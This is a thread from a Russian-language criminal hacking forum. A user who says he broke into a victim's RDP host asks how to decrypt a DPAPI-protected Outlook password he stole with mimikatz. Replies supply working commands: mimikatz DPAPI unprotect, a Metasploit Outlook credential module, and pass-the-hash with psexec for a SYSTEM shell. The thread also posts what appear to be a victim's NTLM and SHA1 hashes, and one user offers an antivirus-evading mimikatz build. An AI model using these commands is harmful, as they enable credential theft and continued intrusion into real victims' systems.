• XSS.stack #1 – первый литературный журнал от юзеров форума

mimikatz - dpapi

Отслеживать
chapo

chapo

(L3) cache
Забанен
Регистрация
22.03.2021
Сообщения
165
Реакции
51
Пожалуйста, обратите внимание, что пользователь заблокирован
Привет всем, я не знаю, правильный ли это саб, но попробую.

Получил доступ, на котором я запустил mimi, получил пароли и все в порядке.

Теперь, когда RDP отключился, и я хочу взломать пароль DPAPI электронной почты, он у меня в формате

Домен: outlook.office365.com * Пароль: 01 00 00 00 d0 8c 9d df 01 15 d1 11 8c ....

как я могу расшифровать эту строку dpapi?
 
docs.microsoft.com

ФÑнкÑÐ¸Ñ CryptProtectData (dpapi.h) - Win32 apps

ÐÑполнÑÐµÑ ÑиÑÑование даннÑÑ Ð² ÑÑÑÑкÑÑÑе DATA_BLOB.
docs.microsoft.com
post/windows/gather/credentials/outlook.rb -< ветку реестра поменяй на ту где хранится пароль
meterpreter > run decrypt_bearshare
 
Пожалуйста, обратите внимание, что пользователь заблокирован
Noob сказал(а):
try this:

01 00 00 00 d0 8c 9d df 01 15 d1 11 8c .... save this into text file cypt.txt

dpapi :: blob /in:crypt.txt / unprotect

PS: Use MIMIKATZ

спасибо, ребята, я перешел на другой RDP, но сохранил его для дальнейшего использования)

Теперь о NTLM, я пытался сломать это с помощью hashcat и обычного поиска в сети NTLM, не повезло, есть еще какие-нибудь идеи?

* NTLM : e19722e7bae36be2a95ba72be2a44369
* SHA1 : 593a6e96b572c884b32b3fb1979ff77a50c602d8
 
chapo сказал(а):
спасибо, ребята, я перешел на другой RDP, но сохранил его для дальнейшего использования)

Теперь о NTLM, я пытался сломать это с помощью hashcat и обычного поиска в сети NTLM, не повезло, есть еще какие-нибудь идеи?

* NTLM : e19722e7bae36be2a95ba72be2a44369
* SHA1 : 593a6e96b572c884b32b3fb1979ff77a50c602d8
если ntlm пользователя(или ДА) домена, им можно подключиться к хостам c помощью psexec
privilege::debug
sekurlsa::pth /user:USERNAME /ntlm:HASH /domain:namedomain
cd C:\Users\admin\Desktop
psexec \\192.0.0.0 -s cmd.exe
 
Пожалуйста, обратите внимание, что пользователь заблокирован
EternalBliss сказал(а):
если ntlm пользователя(или ДА) домена, им можно подключиться к хостам c помощью psexec
privilege::debug
sekurlsa::pth /user:USERNAME /ntlm:HASH /domain:namedomain
cd C:\Users\admin\Desktop
psexec \\192.0.0.0 -s cmd.exe

проблема в том, что RDP изменил пароль, который у меня был для него, теперь у меня есть журнал mimikatz, но мне нужно перебрать все другие учетные данные от других пользователей, чтобы снова получить доступ
 
Пожалуйста, обратите внимание, что пользователь заблокирован
chapo сказал(а):
the problem is that RDP changed the password I had for it, now I have mimikatz log but I need to iterate over all other credentials from other users to get access again
i have my own mimikatz executable that is fud
you need to run this in server or user to get all login users credentials in plain text
 
Пожалуйста, обратите внимание, что пользователь заблокирован
Shell-Hunter сказал(а):
i have my own mimikatz executable that is fud
you need to run this in server or user to get all login users credentials in plain text
through it here on in DM)
 
admin


Напишите ответ...
  • Вставить:
Прикрепить файлы
Верх